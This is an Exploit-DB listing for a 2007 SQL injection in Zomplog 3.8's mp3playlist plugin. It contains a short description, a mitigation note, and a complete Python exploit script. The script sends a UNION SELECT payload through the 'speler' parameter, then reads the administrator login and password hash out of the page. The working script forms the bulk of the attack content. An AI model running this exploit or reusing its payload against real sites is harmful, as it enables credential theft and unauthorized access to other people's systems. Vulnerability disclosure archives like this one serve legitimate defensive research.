Zomplog Remote SQL Injection

vendor:

Zomplog

by:

NeoMorphS

N/A

CVSS

HIGH

SQL Injection

CWE

Product Name: Zomplog

Affected Version From: <= 3.8

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Zomplog Remote SQL Injection

This exploit targets the /zomplog-3.8/plugins/mp3playlist/mp3playlist.php?speler=[sql] endpoint on the Zomplog website. The exploit allows an attacker to perform a remote SQL injection attack. The attacker can retrieve the admin hash from the zomplog_users table by using a UNION SELECT statement. The attack is performed by appending a specially crafted SQL query to the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Zomplog that addresses the SQL injection issue. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/python
#----------------------------------------------------------------------------------
# The sql injection : /zomplog-3.8/plugins/mp3playlist/mp3playlist.php?speler=[sql]
# I've code a sploit for the fun x)
#----------------------------------------------------------------------------------
# Zomplog website : http://zomplog.zomp.nl/
# Contact me : neomorphs-[at]-gmail-[dot]-com

import sys, urllib2

def usage():
	print "+---------------------------------------------------+"
	print "| Zomplog Remote SQL Injection <= 3.8 (mp3playlist) |"
	print "+---------------------------------------------------+"
	print "| Usage : zomplog.py [url + path]                   |"
	print "| Exemple : zomplog.py http://localhost/zomplog neo |"
	print "+---------------------------------------------------+"
	print "|      By NeoMorphS - Thxs to Gu1ll4um3r0m41n       |"
	print "|   Thxs too to #aerox(epiknet) #carib0u(worldnet)  |"
	print "+---------------------------------------------------+" 

def attack(url):
	sql = "/plugins/mp3playlist/mp3playlist.php?speler=999999999%20UNION%20SELECT%200,0,0,CONCAT(login,%200x2D4840434B2D,%20password),0,0,0,0,0%20%20FROM%20zomplog_users%20WHERE%20id=1%20/*"
	print "-> connect to website"
	try: source = urllib2.urlopen(url+sql).read()
	except: print "-> cannot connect to website"; sys.exit()
	try: print "-> admin hash : "+source.split('-H@CK-')[1].split("'")[0]
	except: print "-> cannot find the admin hash"

if (len(sys.argv) < 2):
	usage()
else:
	attack(sys.argv[1])

# milw0rm.com [2007-05-20]